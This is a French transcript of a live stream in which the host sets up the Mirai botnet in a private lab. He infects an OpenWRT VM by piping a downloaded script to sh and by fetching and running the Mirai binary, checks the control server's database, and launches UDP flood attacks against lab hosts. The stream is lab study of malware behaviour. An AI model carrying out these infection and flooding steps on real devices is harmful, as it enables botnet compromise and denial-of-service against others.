reste 45 minutes de stream, grosso modo. Si je me mets à débugger du code C, ça va être un peu... Mais c'est quand même fou. Déclaration implicite. Ok.
Oui, il y a des erreurs en fait. Si je vais dans le répertoire loader et que je lance le. Alors, j'ai gardé le résumé. Ah, toi, tu penses qu'il vaudrait mieux. Ah oui, se concentrer sur les erreurs et pas les warnings. Ce qui est pas con, effectivement. Alors. Warning. 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 Pour l'instant, je vois pas de. Non, il n'y a pas vraiment d'erreur. Ouais, non, de toute façon, il y aurait eu une erreur. Il aurait. Commande exit code 0. Ah! Je recommence. Je tente un point build.sh. Donc là, forcément, il dit rien. Si je fais un écho de dollar point interrogation, le compilateur a fini avec succès. Donc il compile juste le loader. Ouais, c'est ça, il compile juste le loader. Donc, à la rigueur, y a pas, y aurait. Ouais, mais ah, si ça se trouve, c'est peut-être les warnings qui font qu'il. Parce que si je relance le truc, si je relance ce loader-là, je refais mon cat. Non, ça c'est bon. C'était mes beans qui partaient en segfault. Donc si ça se trouve, si je vais directement chercher manuellement le dans mon répertoire là, si je prends le Mirai point, alors j'ai un x86, j'ai pas d'AMD64, je sais pas ce que ça va donner. Ah, ça va être pour ça en fait. Je l'ai pas compilé en AMD64. Si je fais un curl, alors je vais pas me mettre dans hold. Ouais, bon, bah, wget, pardon. Hop. Ouais, il me dit segfault parce que je suis. C'est, ouais, je pense que c'est ça. Parce que si on a un uname, moi. Hop. Un petit truc comme ça, je suis en AMD 64. En revanche, si j'allais chercher. Peut-être pour ça qu'il n'y arrive pas. Alors attends. Mes Debian, je les avais installés en quoi? En. C'est les Alpine que j'avais mis en i386 ou pas? Non, ça c'est du x86-64. Les Debian. C'est du x86-64. C'est pour ça qu'il n'y arrive pas en fait. Et on va aller chercher les OpenWRT. Et là, je suis en i586. Ok, je pense que j'ai compris. Donc là, 10, 6, 0, 111. Allez. Donc. Par contre, effectivement. Ce sera pas du telnet. Ok, allez, allons-y. Donc là, j'avais la 160111, mais je vais la tenter en SSH. Et 160111. Hop, ensuite si je prends la deuxième ici, j'ai quoi comme IP? J'ai la 113. Alors, je sais que c'est tout petit, mais. Donc la 113, elle est là. Hop. Sur le port 22. On va essayer ces deux-là pour le moment. Si je fais. Si je vais donc dans hold et que je fais cat point point slash host.txt pipe point slash loader.
et que je reviens sur mes trucs. Non, il n'y a rien. Il y a un fichier DHCP qui date d'il y a très longtemps. Si ça... Non, je pense qu'il faut que je le build en AMD64 pour pouvoir vraiment essayer d'avoir des victimes. Donc, on va revenir ici. Et on va essayer... Non, c'est setup.sh qui m'intéresse. Il dit quoi? Dans debug, dans release, ok. Alors, la fonction compilebot de la 1GCC. Dans le cas d'une release, il me fait bien un i586, mais ça ne me suffit pas. Moi, ce que je voudrais, c'est vraiment qu'il me fasse un AMD64. Donc, ce que je vais faire, c'est que je vais aller regarder si dans l'autre code... Est-ce qu'il avait un truc pour le compiler en... Ah, mais il le faisait en plus, hein, tout ça. D'accord. Alors, donc là j'avais. Compilebot. Bon, alors allons voir. Ici, compilebot, ça fait quoi? Compilebot. $1-GCC. Mais donc ce que je pourrais faire, c'est lancer ça. Et juste faire un GCC en fait. Si je vais ici. Tu n'as pas vraiment suivi, mais il donne pas la version compilée pour AMD64 et tu n'arrives pas à compiler. Alors, en fait, ce qui se passe, c'est que, effectivement, il ne donne pas la version AMD64. Enfin, en tout cas, il n'y a pas dans les scripts de quoi compiler de l'AMD64. Et si je tente de faire fonctionner du code x86 sur AMD64, vu que j'ai pas les multilib, ça ne fonctionnera pas. Ceci étant, je viens de penser à un autre truc. Je peux peut-être tenter... Cette machine-là, c'est la 111. Donc, root at 10.6.0.111. Yes. Password. Voilà. Donc là, je suis sur l'OpenWRT. Et là, je suis bien en i686. Donc maintenant, si je reprends dans la doc, alors ça c'est lequel? Ça c'est non. Ça c'est lequel? C'est pareil ici. Non. Hop. C'est celui-ci où il dit curl. Donc est-ce que j'ai curl là-dessus? Non.
Donc je vais installer curl et wget. Voilà. Et ensuite, je fais ça, pipe sh. Donc là, normalement, je devrais avoir un nouveau membre dans mon botnet. Ou pas. C'est bizarre ça. Alors je vais le prendre moi-même, je vais voir ce que ça donne. Donc j'ai un Mirai.x86. Allez. Ah. DVR helper. Voilà. Wget, je récupère le Mirai.x86. chmod plus x mirai x86 segfault. Ok, donc en fait, même, je sais pas, je vais peut-être tenter de le, bah, il s'est carrément effacé. C'est dingue ça. À moins que ce soit une mesure de... Ouais non, code retour 139. Il s'appelle DVR. Il est censé me l'appeler comment ensuite? Il est censé me l'appeler DVR Helper, un truc du genre. Hein. Où est-ce qu'il était le... Voilà. C'est ça. Et ensuite... Ah non, tiens. Il a dit listening tune 0. Donc il est toujours... Il a disparu l'enfoiré. Il s'est effacé. Il a un mécanisme d'auto-effacement. Et est-ce que là... Hein, deleted client. 10.0.111. Donc on recommence. Visiblement, il faut que l'outil s'appelle DVR Helper. Ok. Ouais, donc il s'est... Pour voir le terme OpenWRT. Le terme OpenWRT... Bah il est là le terme OpenWRT. Il est juste à gauche du chat. C'est là hein, le terme... Ah oui, d'accord, ça dépend... Ah oui, quand je suis en bas... Quand je suis en bas, ok. Ah oui, donc en fait, il faudrait que je le. Hop, que je le mette ici. Voilà. Ok. Je comprends un peu mieux. Voilà. Mais donc là. Et il m'a enlevé le fichier DVR Helper. Donc il a un mécanisme d'auto-effacement. Mais il est censé avoir fait quoi au juste sur le système? Il s'est planqué quelque part. Alors, du coup, ce que je suis tenté de vouloir faire, c'est d'aller sur une machine .10.6.0.112. Non, hop, en tant que route.
Honnêtement, non, je suis pas dev. Je suis pas dev. Et donc, si je retente ce que j'avais fait là, hop, donc je vais récupérer ça. Remarque, il est censé être statique, hein, le truc. Hop, voilà. Histoire d'éviter de l'heureux. VRHelper. Voilà. chmod 77. Non, 1777. DVRHelper. Et point slash. Co. Hein? Ouais, donc ici, c'est. Ok. Et effectivement. Bah non, on l'a pas vu le 112. Ah si, voilà. Non, mais c'est qu'en fait, il s'efface pour se remettre, d'accord. Ok, donc il s'est réenregistré auprès du botnet. Enfin, je pense. Ce que je pourrais peut-être faire, c'est faire un petit sudo mysql moins u root moins p. Alors, remarque, j'ai pas besoin du sudo normalement. Oh bof. Voilà. Hop. LS, dans une base de données, tout va bien. Show tables plutôt. History users whitelist. Select étoile from history. D'accord, donc ça c'est l'history des commandes que j'ai faites. Ok. Select étoile from users. Là, c'est parce que c'est lui. Ouais, ok. Oh, password en clair en plus. Et from select étoile from whitelist. Et y a rien. Ok. Vanilla, c'est pour les devs, et Vanina, c'est. J'ai pas compris la blague. J'ai pas compris la blague, no screen farm, désolé. Non. Ah, oh, punaise. Zut. Donc là, je suis toujours. Ouais, donc j'ai trois tables en fait, j'ai pas grand chose. Donc il garde même pas en mémoire qui. Il garde même pas en mémoire qui est dans le botnet en fait. Et surtout au niveau des commandes. Parce que si je retente un HTTP comme ça. Puis je vais faire 600. Supposons que ce soit des secondes. 600 secondes, c'est censé faire. C'est censé faire 10 minutes. Donc là, je vais voir des choses, non? Donc là, si je reviens sur. Si je reviens là, non, il n'y a rien. Alors, à moins que le firewall les arrête. Mais quand même, le firewall, c'est le. Il est où? FWL0 website. Alors, remarque, je vais peut-être pas voir grand-chose si je le mets là. Si je viens ici.
Mon IP. Non, ça c'est virbr0. C'est mon. Voilà. 10, 13, 31. Bah, de toute façon, c'est très simple. Hein. Ma route par défaut. Hop. Bah, de toute façon, j'ai le. Voilà, j'ai l'interface. Donc, ça devrait être admin. Oups là, admin. Ah non, si c'est pas admin, c'est route. Alors, on est d'accord que si je vais regarder mes règles de NAT et que j'ai mon port forward vers le DVWA. Ah non, tiens, c'est 10.2.1.4. C'est 10.2.1.4, autant pour moi. Donc si ça se trouve, je tape pas sur le bon. Eh ben écoute, on va taper. On va essayer de taper sur un autre. Hein. Hop, donc. 10.2.1.4, on va mettre 600. Please wait before sending. 484 secondes. Non, mais attends, je vais pas attendre. Je vais pas attendre 4 minutes. Hein. Comment ça, HTTP, c'est pas une attaque valide? Attends, je les ai ici. Alors, kernel ou autre, saveur, vanilla pour les devs, et vanilla, c'est dev. Ah, c'est peut-être, ok, je crois que je commence à comprendre, c'est à cause du chanteur et qu'il y a une chanson, bon, d'accord. Je suis pas forcément très calé en chanson française, hein. Ça fait longtemps que j'ai pas entendu du Dave. Mais ok. Ok, pas mal. Bien, bien trouvé nos screen found. Bien trouvé pour la blague. Pas mal. Il m'ennuie, j'ai pas envie d'attendre encore 400 secondes, moi. Il n'y a pas moyen de lui dire, non mais vas-y, arrête. À moins que je restarte le truc. Si je fais ça... Hop, que je recommence. Voilà, il a perdu la connexion. Je suis content d'avoir la connexion au botnet quand même, hein, au moins au centre de contrôle. Ça déjà, c'est un vrai progrès par rapport à la semaine dernière. Allez. Ah, et puis il a gardé en mémoire le... Oh, le... Voilà. Ou alors je vais taper dans la DB, non? Parce que si je vais dans la DB... hop. Si je vais dans la DB et que je fais use Mirai pour utiliser donc la base Mirai, je fais un show tables et que je fais select étoile from history. C'est qu'en fait, là, il a des trucs. Alors, je suis assez rouillé en MySQL et en MariaDB. Mais si je cherchais un truc du genre MySQL clear, clear table. Delete data from table. MySQL delete. Voilà. Delete from where... Where maxbots. Ah non, si je fais un where 1 en fait.
Voilà, donc là j'ai purgé mon truc. Donc si ça se trouve. Alors moi qu'il est carrément gardé en mémoire et qu'il est... il se serve pas de la base de données. Voilà. Là c'est bon. Donc maintenant. Non, rien. Pourtant je suis bien sûr DVWA. 10214. Si je vais ici et que je fais host dvwa.example.com, il dit bien 10214. Ok. Et si. Donc en fait, dans la base de données MySQL, il n'indique pas les... comment dire? Il garde pas l'IP des membres du botnet. Je suppose qu'il garde tout en mémoire de façon volontaire pour éviter en cas de saisie du serveur. Comme ça, quand la machine se fait shut, et ben y a rien. Mais on est d'accord qu'en théorie, celle-ci, elle est censée participer au botnet. Donc, si je fais un petit TCP dump... Est-ce que j'ai un TCP dump là-dessus? Et que je fais un TCP dump... Moins N, moins I... Non, pas besoin. Moins N, donc là, il balance tout. Host 10.2.1.4. Donc il listen bien sur l'interface principale, mais non, mais il envoie rien en fait. Alors, on va essayer avec un peu plus, on va essayer 600 ou 6000. Allez, 600. HTTP is not a... ah. 2.1.4, ça va être le copier-coller qu'il a pas dû aimer. Voilà. Non, là, rien. J'ai un TCP dump là-dessus. Non. Ok. Killed. Oh là. J'ai... Normalement, c'est une interface qui s'appelle TH0. Moins N, moins I, ETH0. Ah, pourtant, il devrait... D'accord, killed. Ok. Si ça se trouve, j'ai peut-être même pas assez de RAM pour faire tourner TCP dump. Puisque bon, j'ai genre 256 MB de RAM, non, sur les OpenWRT. Peut-être même moins, j'avais pas descendu encore plus bas. Je leur avais fait des toutes petites VM de mémoire. Ah oui, 32 mégas. Ah oui, il va faire un TCP dump avec 32 mégas de RAM. Donc là, je suis un peu embêté. Parce qu'en fait, j'ai l'impression que entre... mes victimes... J'ai pas l'impression que le botnet marche des masses, en fait. J'ai bien un truc qui s'est lancé, mais... Donc ça, c'est le code, on s'en fiche pour le moment. Donc ça, c'est le CNC qui s'est lancé. Bon, ça c'est ma connexion à MySQL. Ça c'est parce que je suis carrément en telnet sur le truc de commande et contrôle. C'est là que je peux envoyer mes ordres. Le scan listen, ok.
Alors, le scan listen, il écoute sur quoi? Parce que j'ai mon Apache qui tourne, ma base de données, j'ai mon centre de contrôle qui est... Ah, si, voilà, j'ai un scan listen qui écoute sur le 4801. J'ai mon CNC qui écoute sur le tel... Ah, il écoute sur le telnet en mode open bar. J'ai le CNC qui écoute sur le port 101. Donc ça, c'est mon telnet qui est... Sur le 111. C'est-à-dire lui. Donc en théorie, il y a une connexion entre l'OpenWRT et le botnet et le centre de contrôle. Je suis curieux. Alors, si jamais je fais... On va essayer d'analyser un peu ça. Hein. Si je relance... Ah, je vais peut-être pas installer. Allez. On va faire un petit peu d'analyse réseau. Hein. Je pense qu'on va se laisser... On va se laisser encore un petit quart d'heure. Hein. Si je fais ça, je suis sur cette interface-là. TCP dump moins i celle-ci. On va faire host. On va faire lui. Voilà. Et ce que je vais faire, c'est que je vais relancer mon Bignou. Ouais, non, de temps en temps, j'ai des trucs, hein. Et il se connecte en telnet sur le port 23. Ouais, donc il y a une connexion. Donc là, je devrais avoir un truc. Ouais, c'est ça, j'ai un binaire bizarre. Ah oui, c'est Busybox. Non. Marrant. Il est bien caché quand même, hein? Donc on le voit au PS, enfin on a du mal à le voir au PS, mais au LSOF on voit un truc, hein. C'est assez marrant. Donc le botnet s'est bien installé, enfin le loader s'est bien installé. Il y a une communication. Mais j'arrive pas à avancer plus, hein. Et en plus, je n'arrive pas à voir comment essayer de compromettre d'autres machines depuis celle-là. Ce qui est un peu dommage. Je suis un peu bloqué sur ce coup. Mais au moins, je peux voir qu'effectivement, il y a une communication entre le membre du botnet et le serveur de commande et contrôle. Ah.
et ça m'ennuie un peu de pas pouvoir avancer plus. C'est dommage. C'est dommage. J'étais, je me sens quand même près du but. Je sais pas si vous voyez ce que je veux dire. Vous savez, quand vous savez que vous êtes pas loin, que vous sentez que vous y êtes presque, mais qu'il y a un truc là, qui, cette petite, comment dire, ce petit caillou dans la chaussure ou ce truc dans le genre, là, vous voyez. Bon. On va pas non plus se laisser faire, hein, mais... Alors... Il est censé faire quoi? Il est censé faire du HTTP Flood, ok. Il est censé faire d'autres trucs, genre de l'UDP, du DNS. Et si je tentais un UDP Flood, tiens. Si je fais UDP, UDP, alors je vais refaire la 10.2.1.4. Peut-être pas, non, tiens. Je vais faire sur une autre machine hein, sur laquelle on va pouvoir voir un peu mieux ce qui se passe. Qu'est-ce que j'ai dans mon réseau qui pourrait être intéressant? Ah, et ben il y a peut-être carrément la 10.5.0.2. Ou la 10.6.0.2. Ouais, tiens, la 10.6.0.2, c'est une bonne idée, ça. La 10.6.0.2, elle est chez ISP6. Hop, c'est celle-là. On peut peut-être même s'y connecter en... Ouais, non, on va pas s'y connecter en SSH. Alors je sais que ça va pas super forcément être ultra lisible. Donc là je vais juste installer TCP dump aussi hein. Au cas où. Hop. Donc TCP dump moins IETH0. Ok, donc là on voit des choses. Maintenant, je suis un IPA, je suis bien en 10.6.0.2. Ok. Allez. 10.6.0.2. Ah zut. Allez. UDP 10.6.0.2. Puis on va faire ça pendant. Allez. Invalide attaque duration. Must be. Ah d'accord. Ah bah voilà. Maintenant là j'ai l'info. Je sais que c'est des secondes. Ah, une heure seulement, et ben. UDP 10.6.0.2, et on fait 3600. Allez, cache, bam. Alors là, déjà, j'ai... Comment ça, j'ai perdu la connexion? Hop. Oh, ça marche. Oh, ça marche. Victoire. Victoire. J'arrive à faire des attaques avec mon botnet. Avec mon botnet de une machine. Attends, c'est la... C'est la... C'est la 112, ça, là? C'est pas la 111? Attends, je vois... Je vois la 112, mais je vois pas la 111. Donc la 111, elle... Ah si, elle répond. Hop. Elle participe au moins, celle-là? Non, elle a pas l'air, hein. Et si je me tente de me connecter sur l'autre, là, la... c'est celle-là, la victime des miens. C'est elle, la 111. Non, c'est la 112. Ouais, c'est la 112. C'est là. Et si je fais un top, hein, j'ai quoi en load? Load average 0,69. Ok. Mais là, en attendant, je me fais... là, elle se fait pourrir. Enfin, pourrir, c'est un bien grand mot. Est-ce que j'ai quelque chose à ce niveau-là? Network IO, IP6box, si elle commence à prendre un peu cher. Et on devrait voir dans les victimes la Debian. Bah ça va être la Debian 1. La Debian 1, ouais, qui là, au niveau network, elle. Ça monte et puis elle, les deux montent en même temps. Ok. Faudrait que je voie le moyen. À l'occasion peut-être de mettre un outil de monitoring réseau qui pourrait me donner le débit, quasiment le débit instantané, mais je pense que ce serait un peu lourd sur le lab. J'essaie de voir si des fois il n'y a pas la 11 qui passe, mais non, j'ai pas l'impression. Hein. De temps en temps j'ai d'autres choses, mais... Alors si je... Hop.
puis que je fais proto UDP. Non. C'est pas protocole. Ou c'est juste UDP, je crois. Voilà, juste UDP. Et je suppose que si je lance un autre truc... Est-ce que j'ai un service là-dessus, genre, est-ce que j'ai un Apache j'ai un SSHD Si je fais un... mince. RC services. Non, RC status, je crois. Sous Alpine Linux, voilà. J'ai pas grand-chose, hein, j'ai juste un SSH qui tourne sur celle-ci. C'était juste vraiment pour valider que ça... Que la partie réseau fonctionnelle en fait. Mais bon, voilà, tout n'est pas perdu. J'ai réussi à lancer une attaque UDP. J'ai réussi à lancer une attaque. Ah, je suis content. Je suis content. Au moins là, je. Bon, peut-être que le botnet fonctionne pas tout à fait bien. Mais là, au moins, il y a un truc. Il y a un truc. Et ça, c'est cool. Ah, je suis content. N'empêche, on a pu voir un peu comment, comment fonctionne. Là, en allant faire ces petits TCP dump, en allant taper à droite, à gauche, on a pu voir les connexions entre la machine qui est zombie et puis le centre de contrôle. Et là, avec cette attaque en UDP, c'est pas mal. Ça permet de voir un peu... Le truc, il le pourrit. Il le pourrit. Et alors, ce qui pourrait être amusant, c'est... donc ça, c'est... Non. La victime, c'était la Debian. Hein. La victime, c'est la Debian. Donc, ce que je vais faire, c'est que je vais prendre ici Debian 1. Voilà, je vais la mettre là. Ça. Hein. Donc là, à gauche... On voit, il y a la victime, mais c'est la victime du DDoS. Et là, on a le zombie. Je vais me connecter sur la machine zombie. Puis je vais faire un power off. Voilà, power off. Donc là, fatalement, elle a quitté le botnet. Et là, tout de suite, ça s'arrête. Ah, c'est pas mal, ça. Ah, je suis content. Alors maintenant, on va la redémarrer. Parce que la grosse question que je me pose... C'est est-ce que le botnet a mis un système de... mince, de... comment on dit? De persistance. Est-ce qu'il y a un système de persistance? J'ai pas l'impression, hein. Je sais pas si le truc, il est à nouveau dans le botnet. Si je fais un S... Alors, mon ANPE, hop. Non, plutôt un LSOF. LSOF, moins N, moins I. Parce que c'est au LSOF qu'on le voyait. Hein. Bootp, telnet. Oui, mais ça, c'est le telnet client. Ah non, il n'y a pas de persistance. Sans doute que ce serait trop visible, en fait. Celle-ci, c'est la 112. Donc, si je reprends mon truc là. Voilà, là normalement, si je refais un LSOF, moins... Alors attends, je vais peut-être le faire... Ouais non, je vais le faire ici, moins I, moins N. Et là, cette fois-ci, voilà, on est connecté à nouveau au... Ah, et puis il a un listen, tiens, qui est là. Ah, amusant. Donc il a un listen, plus un... Ok. Ah bah c'est intéressant tout ça. C'est très intéressant tout ça. Et donc si je relance cette fois-ci à nouveau un flou d'UDP mais pour 10 secondes.
Ah non, en fait, tu ne fais... Tu fais une attaque à la fois. Et si jamais l'attaque n'est pas terminée, eh bah tant pis. Faut aller taper directement dans la base de données. Là, je suis à nouveau dans ma... Ouais, là, j'ai... voilà. C'est ça, c'est qu'en fait, il... Bon, si je refais un delete from history. Et que je relance mon truc. Alors, je vais mettre 30 secondes, hein, histoire que j'ai le temps d'aller d'aller faire un alt tab UDP. Ah oui, c'est vrai qu'il a pas l'air d'aimer le copier-coller, hein, le telnet du botnet Mirai. 30 secondes. Voilà. Et là, c'est reparti. Et normalement, au bout de 30 secondes, il est censé s'arrêter. Alors je compte pas les secondes, hein. On va pas s'embêter, mais normalement 30 secondes, ça devrait être relativement ça devrait être relativement court. Et je pense que sur cette réussite, je pense qu'on va pouvoir aller se coucher l'esprit tranquille. Je sais pas vous, mais moi je suis assez content. Ah voilà, il a arrêté. Voilà, ça bouge plus. Ça bouge plus. Ok. Bien, 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 bien. Bon, alors je vous avoue que c'est pas la réussite que j'attendais. Je m'attendais à plus. Mais je suis quand même content. Je suis quand même content parce que malgré tout, quand il y a une machine qui est membre du botnet, il y a des attaques qui se font. Maintenant. Puis en plus, quand le truc est exécuté, voilà, ça appartient au botnet. Donc ça, c'est cool. Maintenant, l'autre partie, ça va être de réussir à compromettre d'autres machines. Ça va être pour le prochain stream sur ce sujet. Donc ce sera pas forcément la semaine prochaine. Parce qu'en fait, au niveau de mes streams, donc il y a le stream de dimanche. Qui aura lieu, hein, 18h, 20h. On fera autre chose que de la cyber à ce moment-là. Mais la semaine prochaine, je vais refaire une pause dans les streams. Donc le stream de dimanche, il est maintenu. Mais le stream du jeudi d'après et du dimanche d'après, eux, seront pas forcément maintenus. Puisque je vais faire une pause dans ces streams-là. Et après, je vais revenir la semaine d'après. Sur ce, moi je pense que on va rester sur ce succès, qui est pas celui que j'attendais, mais qui est existant quand même, donc ça c'est cool. Et moi je vous souhaitais une bonne fin de soirée. Est-ce qu'on se regarderait pas s'il n'y a pas un peu de monde à raider peut-être ce soir? Est-ce qu'il y a des gens ce soir pour faire un raid? Alors. Alors, il y a Virtual Labs, mais il y a 45 personnes. Bon, je pense que pour le raid, ça va être un peu raté. C'est pas grave, on verra une prochaine fois. Mais en tout cas, ça m'a fait plaisir de vous avoir. J'espère que vous avez apprécié au moins de voir cette attaque du botnet Mirai. Moi, j'en suis très content. Sur ces bonnes paroles, je vous souhaite une bonne fin de soirée. Je vous dis à dimanche pour le prochain stream. Et je vous fais des bisous. Bye bye!